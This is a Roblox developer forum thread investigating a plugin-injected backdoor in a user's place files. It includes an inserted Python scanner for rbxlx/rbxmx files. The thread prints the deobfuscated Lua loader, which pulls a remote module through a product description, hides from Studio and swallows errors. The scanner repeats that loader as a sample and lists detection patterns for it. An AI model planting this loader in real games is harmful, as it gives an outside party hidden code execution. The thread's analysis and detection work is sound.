Do I have malicious scripts in my game?

Those tags before and after, the PROP ones along with the special characters, look like the bytes found in a place file with the new compression system. Has anyone had access to your place file?

No. That was a brand new place.

This is what that obfuscated code above turns into:

mPS = game:GetService('MarketplaceService')
pI = mPS:GetProductInfo(2655062037)               -- product whose Description carries the module id to load
mf = tonumber(string.match(pI.Description, '%d+')) -- first number in the description is the module id
if game:GetService('RunService'):IsStudio() then
	return                                        -- does nothing in Studio, so the developer never sees it run
end
pcall(function()                                  -- errors are swallowed; a failed load leaves no output
	require(mf)[pI.Name](game.PlaceId)            -- load the remote module, call the function named after the product, pass this place's id
end)

Basically, it creates the same back door, but only at run time. My question is… how did these files get here? Do these scripts appear in your other places?

2 Likes

I don’t know… I am going to check on my laptop with no plugins installed on a really old place that I made when I didn’t know plugins existed.

It doesn’t happen on my laptop. Right then:

It has to be a plugin because if it is actively happening when creating new places on my main PC, and not on my laptop, then something malicious has wormed its way in through a plugin.

This looks related to https://devforum.roblox.com/t/new-removal-plugin-sirhurt-server-side-backdoor-location-csgdictionaryservice-inaccessable-outside-of-the-place-xml-file/214491. We had the same issue too. It was a huge annoyance.

6 Likes

I don’t have access to that… New member

1 Like

I’ve pulled all the versions of the module 2679263840. Turns out, there is only one version. Also, this module was created 2018-12-25 at 20:47:09 UTC. That report was from 5 days ago, meaning that the creator actually is requiring a different, new module instead of updating it. We need to find the plugin source to see if it ever inserted a script that requires a module that actually has malicious code. Could you upload your plugin directories?

It also means the developer is actively working on this… I wouldn’t run studio any more with your plugins in case he updates it, or sees this discussion since it hasn’t been moved to a private place yet.

1 Like

Sorry, was that supposed to be a reply to me? If so, how do I find the plugin files?

It was kind of to both, going off of what he said. In Studio go to Plugins -> Plugins Folder, which will bring up a GUI for local plugins. Navigate up to the Roblox folder, then back down to Installed Plugins. These are your public plugins. For built-in plugins, go to Roblox -> Versions -> the folder containing the Studio application (there should only be one) -> BuiltInPlugins. Once you have those three, I’d bet we’d all love to see them ^.^

1 Like
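For anyone who wants to check the plugin folders described above without reading every script by hand, here is a small scanner, added here as an example and not code from this thread or from Roblox: it parses rbxlx/rbxmx XML, pulls the Source of every Script, LocalScript and ModuleScript, and scores each against the traits of the deobfuscated loader posted earlier (run-time `require` of a variable, `GetProductInfo` description used as a data channel, the `IsStudio` bail-out, `game.PlaceId` handed to the loaded module, the `pcall` wrapper). The indicator names, the two-hit threshold, the sample file and the asset id in it are all constructed for the example; the only real format assumption is the rbxlx layout (`Item class="Script"`, `Properties/ProtectedString name="Source"`).

```python
"""Scan Roblox XML place/model files for scripts shaped like the run-time
backdoor loader. Added example; sample file and asset id are constructed."""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

SCRIPT_CLASSES = {"Script", "LocalScript", "ModuleScript"}

# One indicator per trait of the deobfuscated loader. No single trait is
# proof (pcall and IsStudio are common in clean code); the combination is.
INDICATORS = [
    # require() of a bare variable: the module id is decided at run time
    ("require_dynamic", re.compile(r"\brequire\s*\(\s*[A-Za-z_]\w*\s*\)")),
    # require() of a literal asset id: the classic off-site module pull
    ("require_asset_id", re.compile(r"\brequire\s*\(\s*\d{6,}\s*\)")),
    # MarketplaceService product description used to carry the module id
    ("productinfo_description", re.compile(r"GetProductInfo\b.*?\bDescription\b", re.S)),
    # bail out in Studio so the developer never sees it run
    ("studio_bailout", re.compile(r"IsStudio\s*\(\s*\)\s*then\s*return\b", re.S)),
    # hand the loaded module this place's id
    ("placeid_argument", re.compile(r"\(\s*game\.PlaceId\s*\)")),
    # swallow errors so a failed load leaves nothing in the output
    ("pcall_wrapped_require", re.compile(r"pcall\s*\(\s*function\s*\(\s*\).*?\brequire\b", re.S)),
]


def scan_source(source):
    """Names of the indicators that fire on one script body, in table order."""
    return [name for name, rx in INDICATORS if rx.search(source)]


def iter_scripts(xml_text):
    """Yield (class, name, source) for every script Item in an rbxlx/rbxmx document."""
    root = ET.fromstring(xml_text)
    for item in root.iter("Item"):  # Items nest, so iterate the whole tree
        cls = item.get("class", "")
        if cls in SCRIPT_CLASSES:
            name = item.findtext("Properties/string[@name='Name']", default="?")
            src = item.findtext("Properties/ProtectedString[@name='Source']", default="")
            yield cls, name, src


def suspicious_scripts(xml_text, min_hits=2):
    """Scripts in one document that trip at least min_hits indicators."""
    findings = []
    for cls, name, src in iter_scripts(xml_text):
        hits = scan_source(src)
        if len(hits) >= min_hits:
            findings.append({"class": cls, "name": name, "indicators": hits})
    return findings


def scan_directory(root, min_hits=2):
    """Walk a plugin or place folder (e.g. the Installed Plugins folder) and collect findings per file."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in (".rbxlx", ".rbxmx"):
            try:
                found = suspicious_scripts(path.read_text(encoding="utf-8", errors="replace"), min_hits)
            except ET.ParseError:
                continue  # damaged XML (or a binary file with the wrong extension): skip it
            if found:
                report[str(path)] = found
    return report


# Constructed sample: a clean script with its config module, plus one loader
# shaped like the thread's deobfuscated code. 1234567890 is a placeholder id.
SAMPLE_RBXMX = """<roblox version="4">
  <Item class="Script" referent="RBX1">
    <Properties>
      <string name="Name">Greeter</string>
      <ProtectedString name="Source">local cfg = require(script.Config)
print('Hello from ' .. cfg.Name)</ProtectedString>
    </Properties>
    <Item class="ModuleScript" referent="RBX2">
      <Properties>
        <string name="Name">Config</string>
        <ProtectedString name="Source">return { Name = 'Demo' }</ProtectedString>
      </Properties>
    </Item>
  </Item>
  <Item class="Script" referent="RBX3">
    <Properties>
      <string name="Name">Loader</string>
      <ProtectedString name="Source">mPS = game:GetService('MarketplaceService')
pI = mPS:GetProductInfo(1234567890) -- placeholder id, not the real asset
mf = tonumber(string.match(pI.Description, '%d+'))
if game:GetService('RunService'):IsStudio() then
	return
end
pcall(function()
	require(mf)[pI.Name](game.PlaceId)
end)</ProtectedString>
    </Properties>
  </Item>
</roblox>
"""

if __name__ == "__main__":
    for f in suspicious_scripts(SAMPLE_RBXMX):
        print(f"{f['class']} '{f['name']}': {', '.join(f['indicators'])}")
```

Point `scan_directory` at the Installed Plugins folder from the instructions above to get a per-file list of scripts worth opening; a clean script trips nothing, the sample loader trips five of the six traits. The threshold is deliberately low because a real plugin can spread these traits across several scripts, so treat a two-hit result as a prompt to read the file, not as a verdict.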

Yes, this is a malicious script. You almost definitely ran a rigged plugin which inserted code at startup. The bright side is that private module support is being discontinued which hinders a good amount of malicious infection attempts like this. Check your plugins, check your assets, clean your game of foreign material.

I find it interesting that the author used a public module for this attack… not that a private module would have saved them from our prying eyes. Private modules aren’t actually 100% private; consider them obfuscated.

1 Like

“Exploit” developers who add infected code to plugins and bot them to a popular state assume that the user installing them isn’t knowledgeable about the methods they’re using, despite being “out in the open”, so those who don’t bother to properly check code get affected by this. It’s a bunch of redirection nonsense, I can only assume.

2 Likes

This is slightly off topic, but one more post for me. I had mentioned earlier that having a trusted authority to certify code is probably a better method than requiring everything to be public. At least non-technical developers or those without the inclination would know which code they can trust and which might be risky at a glance. If someone wants to revive that post, I’d be happy to add some more comments xD

1 Like

Ok ‘PluginsFolder’ is empty so no local plugins.

I can’t upload a folder to the forums for some reason, but there are installed plugins, and the same with built-in plugins.

How about a link to a file sharing service?

Am I allowed to?

Bear with me.

I just glanced through the rules quickly and didn’t see anything about it. It is a common practice to post links to GitHub with code and possibly executables. If you would like, you can upload each of the rbxmx files one by one instead of the folder.

I’ll risk it for the sake of time

Here: https://www.dropbox.com/sh/t16y7oc44yv0fql/AACanMcaEUA3WGReGc9cXCsFa?dl=0
(for any moderators who might think this is leading people off-site for a bad reason, it is a link to a folder containing my current plugins)

I’m not seeing the bad plugin. I’ve checked your 8 public plugins but haven’t gone through the built-in ones (they are massive, and more trusted). The thread above does list an offending plugin, and the obfuscated code responsible is immediately apparent… unlike in your plugins. Now, installing the offending plugin listed in the thread above, it is shocking to me that the injected back doors exist in a new place even after the plugin has been removed. This may be the case with your plugins; the offending plugin has already been removed. When you found out about this issue, did you remove any plugins? What plugins have you used in the past couple of months?

Note: I’m intentionally not listing the offending plugin’s name listed on the other thread; doing so is a breach of trust.